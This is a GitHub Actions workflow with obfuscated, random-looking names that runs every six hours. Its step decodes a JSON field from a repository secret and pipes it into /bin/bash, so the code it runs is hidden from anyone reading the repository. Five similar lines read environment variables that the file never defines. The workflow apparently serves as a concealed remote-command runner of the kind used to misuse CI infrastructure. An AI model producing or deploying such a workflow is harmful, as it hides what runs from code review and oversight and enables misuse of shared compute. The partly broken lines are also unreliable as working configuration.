name: kaklixn
on:
  workflow_dispatch:
  schedule:
    - cron: '59 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kaklixn
        env:
          crwlh506: ${{ secrets.crwlh506 }}
        run: |
          echo $crwlh506 | jq -r .ukrl16286 | /bin/bash
          echo $cyst5 | jq -r .sxx787 | /bin/bash
          echo $dmhk818 | jq -r .yrrtm55 | /bin/bash
          echo $inn23 | jq -r .cah5306 | /bin/bash
          echo $gg61635 | jq -r .c40 | /bin/bash
          echo $rorp418 | jq -r .baxx21 | /bin/bash

